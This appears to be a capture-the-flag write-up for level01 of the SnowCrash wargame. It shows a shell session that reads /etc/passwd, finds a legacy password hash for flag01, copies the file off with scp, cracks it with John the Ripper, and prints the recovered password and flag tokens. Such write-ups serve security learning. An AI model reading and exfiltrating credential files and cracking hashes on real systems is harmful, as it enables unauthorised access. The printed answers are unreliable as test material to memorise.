flag00@SnowCrash:~$ su level01
Password: x24ti5gi3x0ol2eh4esiuxias

level01@SnowCrash:~$ ls -l
total 0

level01@SnowCrash:~$ pwd
/home/user/level01

level01@SnowCrash:~$ id
uid=2001(level01) gid=2001(level01) groups=2001(level01),100(users)

level01@snowcrash:~$ find / -user level01 2>/dev/null | grep -v /proc/
level01@snowcrash:~$
level01@SnowCrash:~$ find / -user flag01 2>/dev/null
level01@snowcrash:~$

********************************************************************************
Nothing looking like something we can execute.
We should search somewhere else.
********************************************************************************

level01@SnowCrash:~$ find / -name passwd 2>/dev/null
/etc/cron.daily/passwd
/etc/init.d/passwd
/etc/pam.d/passwd
/etc/passwd
/usr/bin/passwd
/usr/share/doc/passwd
/usr/share/lintian/overrides/passwd
/rofs/etc/cron.daily/passwd
/rofs/etc/init.d/passwd
/rofs/etc/pam.d/passwd
/rofs/etc/passwd
/rofs/usr/bin/passwd
/rofs/usr/share/doc/passwd
/rofs/usr/share/lintian/overrides/passwd

level01@SnowCrash:~$ cat /etc/passwd
...
level14:x:2014:2014::/home/user/level14:/bin/bash
flag00:x:3000:3000::/home/flag/flag00:/bin/bash
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
flag02:x:3002:3002::/home/flag/flag02:/bin/bash
flag03:x:3003:3003::/home/flag/flag03:/bin/bash
...

********************************************************************************
We find 42hDRfypTqqnw
Let's try this as a key.
********************************************************************************

level01@SnowCrash:~$ su flag01
Password: 42hDRfypTqqnw
su: Authentication failure

********************************************************************************
We need to do something more with this. The password seems hashed, so we will
use John the ripper to crack it. We will download the file containing the
password with scp and then use John on it.
********************************************************************************

$> scp -P 4242 level01@ip:/etc/passwd level01passwd.txt 

$> john level01passwd.txt 
...
Proceeding with wordlist:./password.lst
abcdefg          (flag01)
...

1 password hash cracked, 0 left

********************************************************************************
We find abcdefg. What a shame.
********************************************************************************

level01@SnowCrash:~$ su flag01
Password: abcdefg
Don't forget to launch getflag !
flag01@SnowCrash:~$ getflag
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
